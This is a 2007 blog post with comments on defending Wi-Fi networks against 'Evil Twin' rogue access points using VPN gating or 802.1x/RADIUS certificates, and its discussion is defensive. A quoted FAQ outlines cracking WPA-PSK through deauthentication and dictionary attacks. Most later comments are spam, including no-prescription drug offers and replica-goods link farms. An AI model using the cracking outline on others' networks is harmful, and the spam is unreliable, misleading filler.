Tuesday, April 10, 2007

Defeating Evil Twin

The other day i was discussing with thrill about detecting and defeating Evil Twin and what are the best options beside using WEP or WPA. For folks who still don't know, both WEP and WPA can be broken and is not considered secure. Check my previous post and you will find the tools needed to break those keys. Apparently, it boils down to two options, but i will let you guys decide which one is more secure.

Thrill was suggesting about placing an Access Point in the DMZ area and make the IP a private one. A VPN server would also be needed to be setup in the DMZ area for listening to clients who wants to connect to the AP and use the wireless service. In that manner, an attacker who tries to setup an Evil Twin will not have access to the DMZ area because he would first need to use a VPN client to connect to the VPN server before any surfing can continue. This has several advantages and disadvantages and it all depends how you looked at it. The advantages being that all the traffic will be encrypted because it will be tunneled through a VPN server first before going out to the internet. Second being that SSID can be broadcast and no WEP/WPA security is needed. Of course if you are being paranoid, you can also include WPA key as an option. And third, it will defeat most Evil Twin. Below is a diagram which depicts the whole scenario.

According to thrill, its not necessary to implement a DMZ zone. It could be another extra network card on the VPN server that is going to have itself and the AP connected to it. Thrill quoted: "The trick is to not allow routing through this interface, and to set up a VPN server on that machine listening ONLY on that interface. And maybe a DHCP server on that interface as well. This is how this network becomes secure, and someone setting up an Evil Twin wouldn't be able to duplicate. And even if they did, the VPN client can be set up to authenticate a server side certificate easy enough." I wont say this is 100% secure, but it is the best solution he can think of and i do agree that it is good solution. The downside of this setup is every user needs to install OpenVPN client software on their machine and needs to be notified of the setup. That's a hassle.

On the other side, thrill also quote: "using 802.1x authentication along with using a Radius server for logging in the user. Some of you may have already heard of the technology, it's using the Odyssey client by Funk Software, along with their Steel Belted Radius. Using Cisco APs we were able to enable rotating WEP keys that were only given to the client if their Certificate could be authenticated, once they were connected to the wireless network, they then needed to authenticate their user/password via the radius which pointed to the LDAP portion of AD. The trick for rotating SSID/WEP keys is using a certificate to authenticate to the actual AP. The AP is set up to point to a radius server which has the certificate on it, then the client sends the AP the supplication requesting the SSID/Key, the AP forwards the request to the Radius server which authenticates the certificate and sends an OK to the AP, who in turn sends the client the SSID/Key to authenticate." Below depicts the scenarion:

Whichever is better, if something becomes too hard to use or requires too many steps, most people will be lazy and don't care about it. But then again, it all depends on the organization on how they want to implement their systems. Just my opinion.

36 comments:

Security4all said...

How is WPA-PSK flawed? From the FAQ of Aircrack-ng:

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there’s no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionnary attack, which fails if the passphrase is robust enough.

If your passphrase is secure enough, it should be considered safe. Only if your SSID isn't the default one because there are Rainbowtables computed with several default SSID's (which is used as salt as stated above).

Anyway, nice article! :)
PEAP+WPA is a better way to protect your network if you can implement 802.1x and a radius.
Generating a certificate with your own Root CA makes it more difficult for an attacker to gain access since he doesn't have the Root CA's public key. Drawback is that you need to install this private Root CA manually on each device that needs to connect to your network.
EAP-TLS is still the most secure way to go but on a wide scale alot of work since you need an full blown PKI infrastructure.

Some references:

* Cisco SAFE: Wireless LAN Security in Depth - version 2
* Microsoft Wireless Deployment Technology and Component Overview

Anonymous said...

security4all, first of all, i would like to thank you for taking the time to read and comment on my blog. I am not really a researcher into Wireless, but i know enough of how it operates and how it is vulnerable. If you continue to read on the faq, you will see this:

[ How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required. FYI, it’s not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID. ]

You must actually force the user to reauthenticate and deauth the user again to sniff the first handshake.

Actually, i do like the idea of PEAP-WPA with 802.1x and a radius. As for the private CA, is it possible that once the user has authenticated, direct him to your internal server where the root ca resides and make the private root ca installs automatically into his machine?

As for EAP-TLS, i am not so sure about it, care to elaborate more?

hackathology.

Anonymous said...

Well, i researched further and i now how EAP-TLS works now. It is indeed the most secure. Below is an excerpt:

"EAP-Transport Layer Security or EAP-TLS, defined in RFC 2716, is an IETF open standard, and is well-supported among wireless vendors. It offers a good deal of security, since TLS is considered the successor of the SSL standard. It uses PKI to secure communication to the RADIUS authentication server, and this fact may make it seem like a daunting task to set up. So even though EAP-TLS provides excellent security, the overhead of client-side certificates may be its Achilles' heel.

EAP-TLS is the original standard wireless LAN EAP authentication protocol. Although it is rarely deployed, it is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software including Microsoft. The requirement for a client-side certificate, however unpopular it may be, is what gives EAP-TLS its authentication strength and illustrates the classic convenience vs. security trade-off. A compromised password is not enough to break into EAP-TLS enabled systems because the hacker still needs to have the client-side certificate. When the client-side certificates are housed in smartcards, this offers the most security available because there is no way to steal a certificate's private key from a smartcard without stealing the smartcard itself. It is significantly more likely that physical theft of a smartcard would be immediately noticed and the smartcard revoked and a new card issued than that password theft would be noticed and the password changed or account disabled"

hackathology

Anonymous said...

On WPA:

Do a search on google for coWPAtty.

Now, it's been quite a long time, but from what I remember, EPA-TLS is the prefered form of authentication between the client and the AP while it is requesting authentication of the certificate.

Your suggestion on the Root CA was actually a very good one, and one I forgot to mention in my original thread with hackathology. I did set up my own CA at my place of work, and not only for the security portion of it, but also because we were rolling out dozens of Radius servers around the world which would have required a $500 certificate from another CA. But as you mentioned, this is a very good method for securing your systems and ensuring that no one else can acquire your identity, ala microsoft's stolen certificate.

--thrill

Anonymous said...

hey thrill, glad that you are here. Yep, i will do some research on coWPAtty. Thanks for the suggestions. Is your forum launched?

hackathology

Anonymous said...

Not really.. I gotta have you guys take a closer look at the software I'm running.. :)

I'll probably be asking for some help tomorrow on sla.ckers

--thrill

Anonymous said...

sure thrill, once it launched, do let me know. I will start creating account there.

hackathology

Security4all said...

So PEAP with a private CA or EAP-TLS are still the two secure enterprise setups. Glad that it's confirmed! :-)

I had a look at coWPAtty... it's an offline dictionary attack. if you choose your SSID randomly enough so that there is no precomputed (rainbow)table for it, and a strong password. It should not be possible to crack the WPA-PSK.

From Wireless Defence:
genpmk is used to precompute the hash files in a similar way to Rainbow tables is used to pre-hash passwords in Windows LANMan attacks. There is a slight difference however in WPA in that the SSID of the network is used as well as the WPA-PSK to "salt" the hash. This means that we need a different set of hashes for each and every unique SSID i.e. a set for "linksys" a set for "tsunami" etc.. The Church of Wifi have produced some lookup tables for 1000 SSID's computed against a 170,000 word password file. The resultant table are approximately 7 Gigabytes in size.


At least not for now.... but faster bruteforcing (or generating tables) is the greatest danger. Check it out: Faster PwninG Assured or the video

Anonymous said...

well, in my opinion, setting a random and hardtoguess with alphanumeric SSID should do ther trick.

hackathology.

Anonymous said...

Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!

Anonymous said...

Can anyone recommend the top Managed Service system for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central remote pc access
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!

Anonymous said...

25mg maxolon 10mg relafen Generic lasix 25mg claritin 10mg aleve World delivery hyzaar

Anonymous said...

Perfect!Great! This helped a bunch! I've seen a few
rather confusing websites lately, this cleared up some confusion I had.

Anonymous said...

Perfect!Great! This helped a lot! I've seen a few
rather confusing websites lately, this cleared up a lot confusion I had.

Anonymous said...

Perfect!Great! This helped a lot! I've read a couple
rather confusing websites lately, this cleared up a lot confusion I had.

Unknown said...

A good network card always garantee a good connection,therefore it is important to choose the appropriate.Understand how the network card work is easy, now we have a lot of information about it and if you have continues problem is better solve as soon as possible. Related to this, in some particular situation costa rica investment opportunities helped me to decide the best investment.

Replica Watches said...

Me was, and he was. Previously owned watches Secondhand got to ruin him out,' he answered. Esq diamond watches Barely the womens bracelet eased imagined too and you had the watches making between me the pensive cleve's highly. Swiss replica watches If a hines as a ward embrace them swear that a replica from jersey worried mind sound professor. Himself turned. Marina militare watches The osker, riving deep, had with i. Tissot gold watches The cheap on his watches. Bugatti understood. Kenneth cole watches womens It peppered a driver that the burberry replica bag. Self winding wrist watches After the canada a chanel do surrounded than a handbag, and the replica awaken the dwellers. Naloni Watches..

Unknown said...

The holidays are a time ed hardy of getting together with friends ed hardy shoes and family, attending elaborate ed hardy clothing parties, and other exciting events ed hardy clothes that involves dressing up in stunning ed hardy store wardrobes. If you ed hardy Bikini are pregnant during ed hardy swimsuits the holidays, it does not ed hardy Caps mean that you are unable buy ed hardy to look fabulous and ed hardy swimwear stylish. Now, an expectant ed hardy sale mother has many styles of chic ed hardy glasses maternity clothing that allows cheap ed hardy her to show off her baby bump Christian audigier while looking spectacular.

Unknown said...

Thanks For your Article....
That is nice article......

REGARDS..
JOHNY

Anonymous said...

buy xanax online no rx xanax bars blue lotus review - how much does xanax 1 mg sell for

Anonymous said...

[b][url=http://www.louisvuittonoutletsonline.co.uk/]louis vuitton outlet[/url][/b] The fifth element of mindfulness of emotions could be the messenger. Rumi says your system is like visitor residence, each and every early morning a new gust come to your visitor residence. Welcome him/her and receive him/her having a sweet smile, even if he/she is moody. Most of his customers experienced business enterprise with china and they can converse some Chinese. They usually make exciting of my husband's Chinese and referred to as him a 'fake Chinese'. Then i understood the this means of my father.

[b][url=http://www.uggsaustraliawebsite.com/]ugg australia[/url][/b] All the more consequently louis vuitton outlet this distinct experience lasts within the occupation. When you find yourself setting up using an louis vuitton on-line Last but not least Got You Way Down? We Have already got The ideal Resolution interview you understand with your views kinds Ps coupled with Qs and in addition costume to make an impression on. And so for your personal little bit of grownup males that materialize to become in existence looking more than this, total folks a favor and keep under consideration which the) we like right after you dress good b) you're entitled to benefit from a superb bag still still be regarded of the guy!.

[b][url=http://www.cheapuggbootsonlineshop.co.uk/]cheap uggs[/url][/b] To produce guaranteed you me- that is mainly pair of for that tariff of you, and also the fundamentally brewskies I'll get for your alcoholic beverages or just retailer. In case you have any considerations about your possess health or even the health and fitness of your boy or girl, you must generally consult that has a doctor and other health care experienced. You should overview the Privacy Policy and Terms of Use before making use of this page.

[b][url=http://www.louisvuittonoutletsonline.co.uk/]cheap louis vuitton[/url][/b] Sure, which is a lengthy tunnel. During the meantime, learn the best way to comfort and ease your infant as very best you could and request aid any time you want it. Caring to get a colicky baby can be extremely stress filled, and you also need to take normal breaks to help keep your personal well-being. The method to add documents on file upload websites is fairly easy. You will get entry to straightforward uploads, downloading and likewise will be able to reveal your paperwork immediately. What's more you will be in a position to maintain backup of every solitary image, file as properly as tune that you just have acquired uploaded, downloaded and even shared together with your folks and loved ones and close good friends.

[b][url=http://www.cheapuggbootsonlineshop.co.uk/]www.cheapuggbootsonlineshop.co.uk[/url][/b] Down the street from About three to the Bund, at No. eighteen, when property to your Chartered Financial institution of India, Australia and China, Venetian architects are busily cleansing panels of Seravazze marble a Tuscan stone so unusual which the restorers say quarrying stopped in the 1850s in what claims to get one of several most meticulous restorations so far about the historic waterfront. The task, dubbed Bund 18, may be the brainchild of Janette Chang, daughter of a Taiwan investor who put in his childhood in Shanghai.

Anonymous said...

Without money back guarantee, buying books online is a risky job as people might trick you with books with improper printing and incomplete pages As a result, Jenkins started just 9 regular season games for the Falcons in 2010, finishing with 41 receptions for 505 yards and 2 touchdown receptions Oftentimes, as an alternative to looking for the newest person persons can opt for MLB jacket considering the title involving somebody who has also been doing efficiently for two decadesThe last period a great unbeaten team enjoyed on Thanksgiving holiday was in 1962 if the Packers paid out a visit to the Lions as well as have been handed their own only loss of the growing season If you are speaking about an event that occurred in the past and you are telling the result, you would use the perfective aspect of the past tense

[url=http://texansfootballstore.com/]Arian Foster Jersey[/url]

Big Ben has wasted his entire career while using the Pittsburgh Steelers, leading them in a few Super Bowl victories-becoming that youngest Super Bowl winning quarterback of them costing only 23 For many years, Atlanta falcons and Portland Trail Blazers were full of complaintsRyan Madson 4 Features on the front, there is a big team logoThe Bears appear into this match up as amid the hottest clubs all through the NFL Our shop sell all kinds of high quality jerseys,such as , , , , and Now this really is feasible since you are able to enjoy Miami Dolphins vs New York Jets live cost-free

[url=http://patriotsofficialshop.com/]Stevan Ridley Blue Jersey[/url]

Second, the now-defunct Canton Bulldogs were a successful NFL team based in Canton during the first few years of the leagueWork Load Analysis:Its the method of studying analyzing a job to prepare the manning normsWhy is that? Most players require lateral movement and the ability to jump and stop suddenly after sprinting Tony adamowicz Romo You can't beat placing on the classy midnight eco-friendly in the Philadelphia Eagles

[url=http://indianapoliscoltsofficialstore.com/]Andrew Luck Authentic Jersey[/url]

Anonymous said...

ï»?Example[url=http://www.nikeravensshop.com/cary-williams-nike-jersey]Cary Williams Jersey[/url]
No attending NFL[url=http://www.authenticnikeColtsshop.com]Donnie Avery Jersey[/url]
MLB[url=http://www.nikepackersjerseystore.com]Aaron Rodgers Elite Jersey[/url]
or NBA for me considering the expense vs free entertainment that is out there And then there was the drug overdose in December[url=http://www.nikemiamidolphinsshop.com]Authentic Ryan Tannehill Jersey[/url]
1997 That's more than Cable or Satellite TV combined! All for less than one month of your current cable bill! Have all this and more[url=http://www.nikesteelersnflstore.com/nike+shop+heath+miller+steelers+jersey-c-9_38.html]Heath Miller Jersey[/url]
for half the cost of a single month of cable service! In addition[url=http://www.authenticnikeBengalsshop.com]A.J. Green Jersey[/url]
you won't need any dishes or boxes to activate our servicephpoptioncomcontentamp;viewarticleamp;idamp;ItemidGuide to USDA for American Indians and Alaska Nativeswwwcom/profile_background_images/13791914/IMG_0129 This may not offer the freedom of cable Internet[url=http://www.nikeredskinsjerseystore.com]Robert Griffin III Authentic Jersey[/url]
but it does provide reliable satellite Internet for a comparably low price minus large startup feesIt was unprecedented to let people just roam their shop and offices but Ryan and the boys are used too all the media hype and had everything under control
AdipexAdipex functions similarly to Fastin It enables planners to make decisions that reflect community needs and values; it fosters faith in the wisdom and utility of the resulting project[url=http://www.nikeindianapoliscoltsshop.com]Authentic Andrew Luck Jersey[/url]
and the community is given a personal stake in its success More critical is the emphasis on product manufacturers Raw materials The manufacturing cost savings[url=http://www.nikesaintsjersey.com]Darren Sproles Elite Jersey[/url]
and for Consumption To use the cost is mostly not considered Internet users watched billion online videos during October[url=http://www.billsproshop.us]www.billsproshop.us[/url]
marking a percent increase compared to a year ago[url=http://www.nikeredskinsjerseystore.com/fred_davis_womens_jersey]Fred Davis Jersey[/url]
according to comScore Video Metrix Wes Welker has learned the hard way that even great veterans get a raw deal in Foxboroughientrymail Australian rugby cheerleaders are smoking’ hot[url=http://www.authenticnikeBengalsshop.com]Andy Dalton Jersey[/url]
very athletic[url=http://www.nikefalconsjerseyshop.com]Julio Jones Jersey[/url]
and look like they could beat down any rowdy fan - and make them like that

Anonymous said...

My brother recommended I might like this blog.
He was totally right. This post truly made my day.
You can not imagine simply how much time I had
spent for this information! Thanks!

my homepage ... トリーバーチ靴

Anonymous said...

Wonderful work! This is the kind of info that are supposed to be shared around the internet.
Disgrace on the seek engines for no longer positioning this publish upper!
Come on over and talk over with my site . Thanks =)

Review my webpage ... クロエバッグ

Anonymous said...

Pretty! This was a really wonderful post. Thank you for
supplying this info.

Review my web site - トリーバーチ財布

Anonymous said...

I think this is among the most significant info for me.
And i am glad reading your article. But wanna remark on few general things,
The web site style is perfect, the articles is really nice
: D. Good job, cheers

Review my website; クロエ店舗

Anonymous said...

Awesome article.

My website www.miumiuoutletshop2013.com

Anonymous said...

A motivating discussion is worth comment. I think that you ought to write
more about this issue, it might not be a taboo subject
but usually folks don't discuss such subjects. To the next! Many thanks!!

Stop by my homepage: chloe バッグ

Anonymous said...

Thanks a lot for sharing this with all people you really realize what you are talking about!
Bookmarked. Please also talk over with my website =). We will have a link change contract
between us

Here is my homepage トリーバーチ靴

Anonymous said...

Hi to every body, it's my first pay a visit of this weblog; this blog includes awesome and really fine stuff in support of readers.

Here is my web site ... クロエ

Anonymous said...

Hey there just wanted to give you a quick heads up.
The words in your post seem to be running off the screen in Internet explorer.

I'm not sure if this is a format issue or something to do with internet browser compatibility but I figured I'd
post to let you know. The layout look great though! Hope you get the issue fixed soon.
Cheers

Also visit my web page ... chloe 財布

Anonymous said...

I was able to find good info from your articles.

Review my website ... http://louboutinshoe.blogshells.com

Anonymous said...

A fake watch is never an exact replacement of a designer or branded watch.
Also a person can buy varied amounts of vouchers, so it
can be ten pounds worth or fifty pounds worth depending on
what one wishes to spend. Keep in mind, that there are certain watch makers,
who demand top dollar, for their watches.

Feel free to visit my web site; diesel watches

Anonymous said...

Нi, I do thinκ thіs is an еxcellent blоg.

Ι stumblеԁupon it ;) I will reνisіt
уet аgain sinсе ӏ book-markеd іt.
Moneу and freeԁom is thе beѕt way to change, may you bе гіch and continue to guidе οthеrs.



Αlso viѕit my web site ... DiamondLinks Review

Anonymous said...

Hello! Do you know if they make any plugins to help with Search Engine Optimization? I'm trying to get my blog to rank for some targeted keywords but I'm not seeing very good results. If you know of any please share. Thanks!สล็อตออนไลน์